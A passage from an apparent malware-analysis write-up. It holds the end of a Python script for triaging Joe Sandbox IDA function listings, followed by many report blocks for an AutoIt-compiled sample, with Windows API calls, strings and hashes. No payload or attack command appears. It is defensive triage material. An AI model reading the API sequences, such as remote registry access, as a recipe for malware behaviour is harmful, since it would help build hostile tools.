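        elif head.startswith("API String ID:"):
            blocks[-1].api_string_id = head.split(":", 1)[1].strip()
        else:
            m = API_RE.match(line)
            if m:
                args = m["args"].split(",") if m["args"] else []
                blocks[-1].calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["callee"]))
    return blocks

def triage(text: str) -> List[dict]:
    """One row per function: direct APIs, strings, and whether the strings mark it as
    AutoIt3 interpreter scaffolding rather than the embedded script's own logic."""
    rows = []
    for b in parse_blocks(text):
        markers = b.autoit_runtime_markers()
        rows.append({"apis": b.direct_apis(), "strings": b.strings,
                     "markers": markers, "autoit_runtime": bool(markers)})
    return rows

# Constructed sample in the page's format: three blocks abridged from the listing above.
SAMPLE = """\
APIs
• LoadCursorW.USER32(00000000,00007F8A), ref: 01015013
• GetCursorInfo.USER32(?), ref: 010150C8
Memory Dump Source
• String ID:
• API String ID: 2577412497-0
APIs
  • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0102C69B
• _wcscat.LIBCMT ref: 0102C6EE
Strings
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 169749273-3440237614
APIs
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FFFA2E
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
"""

if __name__ == "__main__":
    for i, row in enumerate(triage(SAMPLE)):
        print(i, "AutoIt runtime" if row["autoit_runtime"] else "unclassified", row["apis"])
```

Feed it the whole report section rather than the sample: blocks that come back unclassified and that call process, memory or network APIs are the ones worth reading, while marker hits can be skipped as interpreter code. Calls made through sub-functions are kept on the record but left out of `direct_apis()`, so a block is not credited with behaviour that belongs to a shared helper.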
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,01029207,?,?), ref: 0102BA56
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,01029207,?,?,00000000,?), ref: 0102BA6D
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,01029207,?,?,00000000,?), ref: 0102BA78
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,01029207,?,?,00000000,?), ref: 0102BA85
                                                                      • GlobalLock.KERNEL32(00000000), ref: 0102BA8E
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,01029207,?,?,00000000,?), ref: 0102BA9D
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0102BAA6
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,01029207,?,?,00000000,?), ref: 0102BAAD
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,01029207,?,?,00000000,?), ref: 0102BABE
                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,01032CAC,?), ref: 0102BAD7
                                                                      • GlobalFree.KERNEL32(00000000), ref: 0102BAE7
                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 0102BB0B
                                                                      • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0102BB36
                                                                      • DeleteObject.GDI32(00000000), ref: 0102BB5E
                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0102BB74
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                      • String ID:
                                                                      • API String ID: 3840717409-0
                                                                      • Opcode ID: 04cc988f9ae39c0626d09035e5536cc252ab3677eda1e7f9bf49655f6ed5fb6f
                                                                      • Instruction ID: 36033b594e037670671f26d11816b3aa2419514da74af7cd98395fa28b11baad
                                                                      • Opcode Fuzzy Hash: 04cc988f9ae39c0626d09035e5536cc252ab3677eda1e7f9bf49655f6ed5fb6f
                                                                      • Instruction Fuzzy Hash: 7C414975600219AFDB319F69DC88EAABBBCFF8AB51F208058F985D7254C7759901CB20
                                                                      APIs
                                                                      • __wsplitpath.LIBCMT ref: 0100DA10
                                                                      • _wcscat.LIBCMT ref: 0100DA28
                                                                      • _wcscat.LIBCMT ref: 0100DA3A
                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0100DA4F
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0100DA63
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0100DA7B
                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 0100DA95
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0100DAA7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                      • String ID: *.*
                                                                      • API String ID: 34673085-438819550
                                                                      • Opcode ID: 5133096c73bb394d2cefa7c789d6c249250ecd8aacc8c712686368bba354b8ce
                                                                      • Instruction ID: fe8c4ef83098e063d4bd0160d329f1010063ef6e6c27cefd1c17a0c3facb2501
                                                                      • Opcode Fuzzy Hash: 5133096c73bb394d2cefa7c789d6c249250ecd8aacc8c712686368bba354b8ce
                                                                      • Instruction Fuzzy Hash: C881B4715083419FEB65DFE8C840A6EB7E5BF89310F18486EF9C9C7291EA34D944CB62
                                                                      APIs
                                                                        • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0102C1FC
                                                                      • GetFocus.USER32 ref: 0102C20C
                                                                      • GetDlgCtrlID.USER32(00000000), ref: 0102C217
                                                                      • _memset.LIBCMT ref: 0102C342
                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0102C36D
                                                                      • GetMenuItemCount.USER32(?), ref: 0102C38D
                                                                      • GetMenuItemID.USER32(?,00000000), ref: 0102C3A0
                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0102C3D4
                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0102C41C
                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0102C454
                                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0102C489
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                      • String ID: 0
                                                                      • API String ID: 1296962147-4108050209
                                                                      • Opcode ID: 271cc5f794cbd2df047d094cb4d0ab6f55a8ec172b6d3eec22c367508f314ae1
                                                                      • Instruction ID: 0d61fff6ad76c9139b661fa4f894d31c0b43b5ffd0f828d7fb1c9d76b8b1b5c5
                                                                      • Opcode Fuzzy Hash: 271cc5f794cbd2df047d094cb4d0ab6f55a8ec172b6d3eec22c367508f314ae1
                                                                      • Instruction Fuzzy Hash: EB81A0702083219FE721CF18CA84A6FBBE8FB89354F10495EFAC597251CB35D905CB52
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 0101738F
                                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0101739B
                                                                      • CreateCompatibleDC.GDI32(?), ref: 010173A7
                                                                      • SelectObject.GDI32(00000000,?), ref: 010173B4
                                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 01017408
                                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 01017444
                                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 01017468
                                                                      • SelectObject.GDI32(00000006,?), ref: 01017470
                                                                      • DeleteObject.GDI32(?), ref: 01017479
                                                                      • DeleteDC.GDI32(00000006), ref: 01017480
                                                                      • ReleaseDC.USER32(00000000,?), ref: 0101748B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                      • String ID: (
                                                                      • API String ID: 2598888154-3887548279
                                                                      • Opcode ID: 8207a10afca8fed90fe8128e12b8325e26b7b8dbf234afc6b0ed398fb9e623bd
                                                                      • Instruction ID: 99f1ccfde12f5bb7b14fe2fbe3a002fc6d4749c569d77a8adc0371bc1455b305
                                                                      • Opcode Fuzzy Hash: 8207a10afca8fed90fe8128e12b8325e26b7b8dbf234afc6b0ed398fb9e623bd
                                                                      • Instruction Fuzzy Hash: 46514C7590030AEFDB25CFA8C885EAEBBF9EF48350F14851DF99A97214C739A940CB50
                                                                      APIs
                                                                        • Part of subcall function 00FC0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00FA6B0C,?,00008000), ref: 00FC0973
                                                                        • Part of subcall function 00FA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA4743,?,?,00FA37AE,?), ref: 00FA4770
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FA6BAD
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00FA6CFA
                                                                        • Part of subcall function 00FA586D: _wcscpy.LIBCMT ref: 00FA58A5
                                                                        • Part of subcall function 00FC363D: _iswctype.LIBCMT ref: 00FC3645
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                      • API String ID: 537147316-1018226102
                                                                      • Opcode ID: e9a990aeaa7b9380705f4a1c27611f4bd11aeba9251cc9bc78c3c0302ebe165b
                                                                      • Instruction ID: 77bfcd2909d3f3373090ba36955edf52ee3717405e4775e2c52d2d6449b24502
                                                                      • Opcode Fuzzy Hash: e9a990aeaa7b9380705f4a1c27611f4bd11aeba9251cc9bc78c3c0302ebe165b
                                                                      • Instruction Fuzzy Hash: 4D02CFB15083419FC724EF20C881AAFBBE6EF96354F08481EF4D5972A1DB34D949EB42
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 01002D50
                                                                      • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 01002DDD
                                                                      • GetMenuItemCount.USER32(01065890), ref: 01002E66
                                                                      • DeleteMenu.USER32(01065890,00000005,00000000,000000F5,?,?), ref: 01002EF6
                                                                      • DeleteMenu.USER32(01065890,00000004,00000000), ref: 01002EFE
                                                                      • DeleteMenu.USER32(01065890,00000006,00000000), ref: 01002F06
                                                                      • DeleteMenu.USER32(01065890,00000003,00000000), ref: 01002F0E
                                                                      • GetMenuItemCount.USER32(01065890), ref: 01002F16
                                                                      • SetMenuItemInfoW.USER32(01065890,00000004,00000000,00000030), ref: 01002F4C
                                                                      • GetCursorPos.USER32(?), ref: 01002F56
                                                                      • SetForegroundWindow.USER32(00000000), ref: 01002F5F
                                                                      • TrackPopupMenuEx.USER32(01065890,00000000,?,00000000,00000000,00000000), ref: 01002F72
                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 01002F7E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                      • String ID:
                                                                      • API String ID: 3993528054-0
                                                                      • Opcode ID: 8a227070da320674f98d453303ec808478c2a2d0f5501108e4b291002e6aa62f
                                                                      • Instruction ID: 1751d5de09600351846814ec7b5265791dc5034c603d802415cfe5c1d3a38ad5
                                                                      • Opcode Fuzzy Hash: 8a227070da320674f98d453303ec808478c2a2d0f5501108e4b291002e6aa62f
                                                                      • Instruction Fuzzy Hash: 7371D470640256BAFB329F58DC8DFAABFA8FF04754F10025AF695AA1D0C7B55C20C790
                                                                      APIs
                                                                        • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                      • _memset.LIBCMT ref: 00FF786B
                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00FF78A0
                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00FF78BC
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00FF78D8
                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00FF7902
                                                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00FF792A
                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FF7935
                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FF793A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                      • API String ID: 1411258926-22481851
                                                                      • Opcode ID: 4041b2683828e0368eb994c1efc59082facd2f2b403a367a556863b3962b9dd2
                                                                      • Instruction ID: aae9560a9fbd9076c5affa744b3ae3a3cf39dc3110e7427097570d3e0254044d
                                                                      • Opcode Fuzzy Hash: 4041b2683828e0368eb994c1efc59082facd2f2b403a367a556863b3962b9dd2
                                                                      • Instruction Fuzzy Hash: 2E4108B2C1422DABCF21EFA4EC85DEEB778BF08750F404069F905A7261DA799D04DB90
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101FDAD,?,?), ref: 01020E31
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                      • API String ID: 3964851224-909552448
                                                                      • Opcode ID: 5965779acc915bab2dbc9d6a43d37e564593fea6d7a2d49ecf11a1c3d27dbc91
                                                                      • Instruction ID: 5e6d77a9e29a23603adb38883e6db7354a579b1fd1137346ea5b9190e61ac068
                                                                      • Opcode Fuzzy Hash: 5965779acc915bab2dbc9d6a43d37e564593fea6d7a2d49ecf11a1c3d27dbc91
                                                                      • Instruction Fuzzy Hash: 9541583114435ACBCF81EE14DD56EEF3BA4BF01304F444448FCA51B696DB39996ADBA0
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00FDE2A0,00000010,?,Bad directive syntax error,0102F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00FFF7C2
                                                                      • LoadStringW.USER32(00000000,?,00FDE2A0,00000010), ref: 00FFF7C9
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                      • _wprintf.LIBCMT ref: 00FFF7FC
                                                                      • __swprintf.LIBCMT ref: 00FFF81E
                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00FFF88D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                      • API String ID: 1506413516-4153970271
                                                                      • Opcode ID: 0b86e51dc7f5e35ecfdcc16d1f09397fb7a7718f4037585abc9c42d42f2bc8ac
                                                                      • Instruction ID: a1755a21311429ab1609e4c0fb4e5fea8d60aa9b83af68460324ff83779f6fd9
                                                                      • Opcode Fuzzy Hash: 0b86e51dc7f5e35ecfdcc16d1f09397fb7a7718f4037585abc9c42d42f2bc8ac
                                                                      • Instruction Fuzzy Hash: 9121717290021EABCF11EF91CC4AEFE7739BF18350F04446AF90566162DA759618EB51
                                                                      APIs
                                                                        • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                        • Part of subcall function 00FA7924: _memmove.LIBCMT ref: 00FA79AD
                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 01005330
                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 01005346
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 01005357
                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 01005369
                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0100537A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: SendString$_memmove
                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                      • API String ID: 2279737902-1007645807
                                                                      • Opcode ID: 75e08b4b808ac35a330d9fa97b07dea1653111842b83113f365cafb9bfc7bfc2
                                                                      • Instruction ID: 297a5f32984bc6aa0e8531726822f32ea4a9e7487e665194bb13057491410009
                                                                      • Opcode Fuzzy Hash: 75e08b4b808ac35a330d9fa97b07dea1653111842b83113f365cafb9bfc7bfc2
                                                                      • Instruction Fuzzy Hash: D211C8B1A5421D79E760B667DC49DFF7BBCFB9AB40F40445ABC41960D1DAA04904C9B0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                      • String ID: 0.0.0.0
                                                                      • API String ID: 208665112-3771769585
                                                                      • Opcode ID: 816ed5dd017a41cd7b09ae65b52b73ce201099d26f591c1dd6f62795f473fd8c
                                                                      • Instruction ID: 7cd07a5b093b13b1346aa7a435a8a5001799e1b441933ea9d44677a9af90b112
                                                                      • Opcode Fuzzy Hash: 816ed5dd017a41cd7b09ae65b52b73ce201099d26f591c1dd6f62795f473fd8c
                                                                      • Instruction Fuzzy Hash: CF113531500116ABEB61AA34AC4AEDF77BCEB01311F0001AAF689D6091EF7989818B50
                                                                      APIs
                                                                      • timeGetTime.WINMM ref: 01004F7A
                                                                        • Part of subcall function 00FC049F: timeGetTime.WINMM(?,76C1B400,00FB0E7B), ref: 00FC04A3
                                                                      • Sleep.KERNEL32(0000000A), ref: 01004FA6
                                                                      • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 01004FCA
                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 01004FEC
                                                                      • SetActiveWindow.USER32 ref: 0100500B
                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 01005019
                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 01005038
                                                                      • Sleep.KERNEL32(000000FA), ref: 01005043
                                                                      • IsWindow.USER32 ref: 0100504F
                                                                      • EndDialog.USER32(00000000), ref: 01005060
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                      • String ID: BUTTON
                                                                      • API String ID: 1194449130-3405671355
                                                                      • Opcode ID: b4cb377b898f18b35ccfc9c8aa4c38bd04717003a2869c55a1af83b99519f855
                                                                      • Instruction ID: e556d12b6f0ce6fa00e4299a1ea6ae0fd6024d4a8bfcba92b3e385493840b23c
                                                                      • Opcode Fuzzy Hash: b4cb377b898f18b35ccfc9c8aa4c38bd04717003a2869c55a1af83b99519f855
                                                                      • Instruction Fuzzy Hash: D7216270204206AFF7329F34ED89F2A7BA9EB4A789F141018F6C5811E9CB6B4D508B61
                                                                      APIs
                                                                        • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                        • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                      • CoInitialize.OLE32(00000000), ref: 0100D5EA
                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0100D67D
                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 0100D691
                                                                      • CoCreateInstance.OLE32(01032D7C,00000000,00000001,01058C1C,?), ref: 0100D6DD
                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0100D74C
                                                                      • CoTaskMemFree.OLE32(?,?), ref: 0100D7A4
                                                                      • _memset.LIBCMT ref: 0100D7E1
                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0100D81D
